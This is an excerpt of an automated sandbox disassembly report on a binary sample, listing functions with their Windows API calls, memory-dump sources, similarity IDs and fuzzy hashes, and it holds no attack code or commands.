                                          • Instruction Fuzzy Hash: 94815B79E006259FCF18DFA9C580A6DBBF1FF88704B1586ADD445AB701C770AD52CB90
                                          Function 00A402E0 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 124memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • TlsGetValue.KERNEL32(FFFFFFFF,21472377,?,?,?,?,?,00A90278,000000FF), ref: 00A40315
                                          • TlsSetValue.KERNEL32(FFFFFFFF,?), ref: 00A40359
                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00A90278,000000FF), ref: 00A4037F
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,00A90278,000000FF), ref: 00A40386
                                          • GetProcessHeap.KERNEL32(00000000), ref: 00A403C0
                                          • HeapFree.KERNEL32(00000000), ref: 00A403C7
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00A403D0
                                          • HeapFree.KERNEL32(00000000), ref: 00A403D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Heap$FreeProcess$Value
                                          • String ID: w#G!
                                          • API String ID: 3709577838-519468572
                                          • Opcode ID: be252e311a4f3aa944d72ee648230724d26837556da59f2df13a6029cfe9fc8a
                                          • Instruction ID: 0fe2b1816df7b1a845fa8c91f60deecc2542e9fd11a1bb8e1b6f28f361ee2bbd
                                          • Opcode Fuzzy Hash: be252e311a4f3aa944d72ee648230724d26837556da59f2df13a6029cfe9fc8a
                                          • Instruction Fuzzy Hash: 8D414F39600200AFDF20CFA9D889F1B7BA8EF45721F144669FA15DB291D770EC00DA50
                                          Function 00A80B04 Relevance: 11.9, APIs: 1, Strings: 5, Instructions: 1381COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: __floor_pentium4
                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$w#G!
                                          • API String ID: 4168288129-1234829370
                                          • Opcode ID: 62bd50effdff1c253008f1deb5f3ecf5246c84a61ef4a97d5543b63cd0eb2658
                                          • Instruction ID: ad90d9736943a98be0dd7df5084222bcc2a8ec4e119f0980fb50be3f9041a2f1
                                          • Opcode Fuzzy Hash: 62bd50effdff1c253008f1deb5f3ecf5246c84a61ef4a97d5543b63cd0eb2658
                                          • Instruction Fuzzy Hash: 89C23B71E086288FDB65EF28DD407EAB7B9EB44305F1541EAD84DE7240E774AE868F40
                                          Function 00A7EE42 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 188COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00A7437A: GetLastError.KERNEL32(000000FF,00000000,00A613F8,00000000,00000000,?,00A618DE,00000000,00000000,009EBDFF,?,000000FF), ref: 00A7437E
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743B1
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743F2
                                            • Part of subcall function 00A7437A: _abort.LIBCMT ref: 00A743F8
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743D9
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743E6
                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00A7EF4E
                                          • IsValidCodePage.KERNEL32(00000000), ref: 00A7EFA9
                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00A7EFB8
                                          • GetLocaleInfoW.KERNEL32(?,00001001,00A70C69,00000040,?,00A70D89,00000055,00000000,?,?,00000055,00000000), ref: 00A7F000
                                          • GetLocaleInfoW.KERNEL32(?,00001002,00A70CE9,00000040), ref: 00A7F01F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                          • String ID: w#G!
                                          • API String ID: 745075371-519468572
                                          • Opcode ID: 1853964c95f5b632cad889c37f2c82c9f8cc19f224dbc64979403125130fddb7
                                          • Instruction ID: ac09e85cfbaf5899fa22dd7dd7db29826ae6937c9d8e12125fbddd6b9a3adf27
                                          • Opcode Fuzzy Hash: 1853964c95f5b632cad889c37f2c82c9f8cc19f224dbc64979403125130fddb7
                                          • Instruction Fuzzy Hash: AF514072A00205AFEF20DFA5CC45ABE73B9FF09701F14C5A9F918EB191DB709A408B61
                                          Function 00A52D69 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                          Download Yara Rule
                                          APIs
                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00A52DA2
                                            • Part of subcall function 00A4CB06: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00A4CB27
                                          • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00A52E08
                                          • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 00A52E20
                                          • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 00A52E2D
                                            • Part of subcall function 00A528CD: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00A528F5
                                            • Part of subcall function 00A528CD: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00A5298D
                                            • Part of subcall function 00A528CD: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00A52997
                                            • Part of subcall function 00A528CD: Concurrency::location::_Assign.LIBCMT ref: 00A529CB
                                            • Part of subcall function 00A528CD: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00A529D3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                          • String ID:
                                          • API String ID: 2363638799-0
                                          • Opcode ID: a5f5027fc08d596b01e79e437b2b046a6b2fd84e9d9a49452a0576095eddad7d
                                          • Instruction ID: b5ff6f7224b7b791ec93e74f2213f871aa93251687fe9fe85050d944026d28e0
                                          • Opcode Fuzzy Hash: a5f5027fc08d596b01e79e437b2b046a6b2fd84e9d9a49452a0576095eddad7d
                                          • Instruction Fuzzy Hash: 3F518631A00205EBDF18DF50C996BAEBB75BF85711F154069ED027B392CB30AE09CBA1
                                          Function 009C8380 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 349fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00008003,21472377,00000000,?,00000000), ref: 009C84E3
                                          • FindFirstFileW.KERNEL32(?,?,00AAFB88,00000002,00AAFB84,?,?,?), ref: 009C853F
                                          • SetErrorMode.KERNEL32(00008003,21472377), ref: 009CAF9D
                                          • FindFirstFileW.KERNEL32(?,?,00AAFB88,00000002), ref: 009CAFC5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorFileFindFirstMode
                                          • String ID: w#G!
                                          • API String ID: 3909587737-519468572
                                          • Opcode ID: 7bd45c90107fe0adae2e53d8d220631d46f2611552c82640fe3d3865bab1b277
                                          • Instruction ID: 9976a24b6a13507900a5b7886d91bb847cce035be22640e778b2795e3e84b867
                                          • Opcode Fuzzy Hash: 7bd45c90107fe0adae2e53d8d220631d46f2611552c82640fe3d3865bab1b277
                                          • Instruction Fuzzy Hash: 2DC1E071A0010A9FCB18DF68CD85FAEB7B5FB84310F10866DF8159B291DB34AA85CF91
                                          Function 00A14390 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 263encryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(00000010,21472377,7508FC30,?), ref: 00A143E0
                                          • CryptReleaseContext.ADVAPI32(00000001,00000000,?,00000000,?,00A962DC,00000002, operation failed with error ,0000001D,?,?,OS_Rng: ,00000008,?), ref: 00A14710
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ContextCryptErrorLastRelease
                                          • String ID: operation failed with error $OS_Rng: $w#G!
                                          • API String ID: 3299239745-2349822220
                                          • Opcode ID: 1bc8d31bb6093ee3f5396a6d99b877acc09385dd67c96bfc518f5dd15df1dfb3
                                          • Instruction ID: 1a3d95304026853a39b1a0bf58cdb6d3e14b199a20e57e9b31da2384abb328d8
                                          • Opcode Fuzzy Hash: 1bc8d31bb6093ee3f5396a6d99b877acc09385dd67c96bfc518f5dd15df1dfb3
                                          • Instruction Fuzzy Hash: ADA1A171A10258DFEB18DF68CD85BDEBBB5FF89304F148258E014AB292DB759AC4CB50
                                          Function 00A7E50A Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00A7437A: GetLastError.KERNEL32(000000FF,00000000,00A613F8,00000000,00000000,?,00A618DE,00000000,00000000,009EBDFF,?,000000FF), ref: 00A7437E
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743B1
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743F2
                                            • Part of subcall function 00A7437A: _abort.LIBCMT ref: 00A743F8
                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00A70C70,?,?,?,?,00A706C7,?,00000004), ref: 00A7E5EC
                                          • _wcschr.LIBVCRUNTIME ref: 00A7E67C
                                          • _wcschr.LIBVCRUNTIME ref: 00A7E68A
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00A70C70,00000000,00A70D90), ref: 00A7E72D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                          • String ID: w#G!
                                          • API String ID: 4212172061-519468572
                                          • Opcode ID: 0981c1fa3c3f52ce787f575b91d08a4c253dc2dbcdaf5127252e621ef828418d
                                          • Instruction ID: 652be89401d43f3a464f8ce1e5ec3af9fbb9438f00b3ce67beb9a813607e8201
                                          • Opcode Fuzzy Hash: 0981c1fa3c3f52ce787f575b91d08a4c253dc2dbcdaf5127252e621ef828418d
                                          • Instruction Fuzzy Hash: 9C61E672600206AADB24EB74CD42FAB77A8EF1C710F14C5A9F90DDB191EB70E94187A0
                                          Function 00A7EC6E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00A7EF8D,?,00000000), ref: 00A7ED07
                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00A7EF8D,?,00000000), ref: 00A7ED30
                                          • GetACP.KERNEL32(?,?,00A7EF8D,?,00000000), ref: 00A7ED45
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: ACP$OCP
                                          • API String ID: 2299586839-711371036
                                          • Opcode ID: 474a9d3318931b4b390cd6e327315512dd73bf03a67a30a16e2e18ffd3c005b7
                                          • Instruction ID: a9ecca71df860494783c0d8eea12b48633247cdee70cab37231c6afb3b1c09b1
                                          • Opcode Fuzzy Hash: 474a9d3318931b4b390cd6e327315512dd73bf03a67a30a16e2e18ffd3c005b7
                                          • Instruction Fuzzy Hash: 0821C136B00100AADB35CF65CC00A9777A7EF69B10B66C4E4E90ECB111E732DE41C390
                                          Function 00A7E8F5 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 205COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00A7437A: GetLastError.KERNEL32(000000FF,00000000,00A613F8,00000000,00000000,?,00A618DE,00000000,00000000,009EBDFF,?,000000FF), ref: 00A7437E
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743B1
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743F2
                                            • Part of subcall function 00A7437A: _abort.LIBCMT ref: 00A743F8
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743D9
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743E6
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A7E949
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A7E99A
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A7EA5A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorInfoLastLocale$_free$_abort
                                          • String ID: w#G!
                                          • API String ID: 2829624132-519468572
                                          • Opcode ID: 07a0953c04831360e7da533a7991519db708c54846a0bed4a2ea18550ec87186
                                          • Instruction ID: abd9614db1a902740eeebf1a939b5ba9318d5ca271dc29df61f11595eff47cd6
                                          • Opcode Fuzzy Hash: 07a0953c04831360e7da533a7991519db708c54846a0bed4a2ea18550ec87186
                                          • Instruction Fuzzy Hash: E861A0715102079BEB28DF24CD82BBA77A8FF48341F10C1F9E90ADA195E774E981CB54
                                          Function 00A3C860 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(00A3CC7E,00000008,00000007,00000000,00000003,02200000,00000000,21472377,?,00000000,?,00A3CC7E,?), ref: 00A3C8A3
                                          • DeviceIoControl.KERNEL32(00000000,000900A8,00000000,00000000,00000000,00004000,?,00000000), ref: 00A3C8EA
                                          • CloseHandle.KERNEL32(00000000), ref: 00A3C924
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CloseControlCreateDeviceFileHandle
                                          • String ID: w#G!
                                          • API String ID: 33631002-519468572
                                          • Opcode ID: eca8fc2b6b59f7c4033e724dae925dae2f8ae1b5c8f23abd2a7e99109f7e78a4
                                          • Instruction ID: 95275d6323d2cab90e144f6d1c07d91e8ebdb30a0c4e57d194d04e51a472a234
                                          • Opcode Fuzzy Hash: eca8fc2b6b59f7c4033e724dae925dae2f8ae1b5c8f23abd2a7e99109f7e78a4
                                          • Instruction Fuzzy Hash: 2021C971B84204FFEB20CB68DC46F9AB7B8EB41720F204226FA55B72D0D7749A04D755
                                          Function 00A64F58 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00A65050
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00A6505A
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00A65067
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID: w#G!
                                          • API String ID: 3906539128-519468572
                                          • Opcode ID: 7d7ebd60feec90fe8a415724963aa6205f1f9f38d609316941c9c623947a4c4d
                                          • Instruction ID: 722fd6f0d2a52d95cc0dc85c356d6e138a45a8e8f2bf2a57e45fd284f280762c
                                          • Opcode Fuzzy Hash: 7d7ebd60feec90fe8a415724963aa6205f1f9f38d609316941c9c623947a4c4d
                                          • Instruction Fuzzy Hash: 3E31D675901218ABCB21DF64DD88BDDBBB8BF08310F5042DAE91CA7250EB709F858F45
                                          Function 00A14760 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47encryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00A147F0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00A1487A
                                          • CryptGenRandom.ADVAPI32(00000000,?,?,21472377), ref: 00A1479A
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A147E9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Crypt$ContextException@8RandomReleaseThrow
                                          • String ID: CryptGenRandom$w#G!
                                          • API String ID: 1047471967-1156935335
                                          • Opcode ID: 1ac414dfc9be06289f95fc1a54846b5869adf8ec5731311efc65b487877b83a3
                                          • Instruction ID: 82d14e4d5c641ae411e4853386a01731dec34c0f10d7369ddd81849d1661e331
                                          • Opcode Fuzzy Hash: 1ac414dfc9be06289f95fc1a54846b5869adf8ec5731311efc65b487877b83a3
                                          • Instruction Fuzzy Hash: AC014071904248AFCB15EF94DD41FEEBBB8FF09710F40456AE912AB290DF746908CB90
                                          Function 009B1020 Relevance: 6.3, Strings: 5, Instructions: 46COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: __onexit
                                          • String ID: Dflt$Dflt$Dflt$Dflt$w#G!
                                          • API String ID: 1448380652-4237716125
                                          • Opcode ID: aa401cd8f66066315f62c6f0a8073c165064e23514ec4732aa1403a9455110be
                                          • Instruction ID: 61cf832efdf7861fab391c5457799f418224788348873de5441b151f405c4f3f
                                          • Opcode Fuzzy Hash: aa401cd8f66066315f62c6f0a8073c165064e23514ec4732aa1403a9455110be
                                          • Instruction Fuzzy Hash: 92114CB4946744EFE301CFD0ED1AF5A7BA0F305708F00861AE6461B7E0C7BA150ACB95
                                          Function 00A7311A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00A706C7,?,00000004), ref: 00A7316D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
